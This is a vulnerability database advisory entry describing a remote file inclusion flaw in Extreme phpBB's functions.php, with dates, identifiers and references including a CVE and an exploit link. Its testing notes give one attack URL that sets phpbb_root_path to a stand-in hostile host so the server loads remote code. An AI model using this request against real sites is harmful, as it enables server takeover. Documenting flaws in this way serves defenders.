Extreme phpBB functions.php phpbb_root_path Variable Remote File Inclusion

2007-02-24T00:00:00
ID OSVDB:36957
Type osvdb
Reporter OSVDB
Modified 2007-02-24T00:00:00

Description

Manual Testing Notes

/includes/functions.php?phpbb_root_path=http://evilscripts?

References:

ISS X-Force ID: 32685 Generic Informational URL: http://sourceforge.net/project/showfiles.php?group_id=95900%20] Generic Exploit URL: http://www.milw0rm.com/exploits/3370 FrSIRT Advisory: ADV-2007-0733 CVE-2007-1105 Bugtraq ID: 22708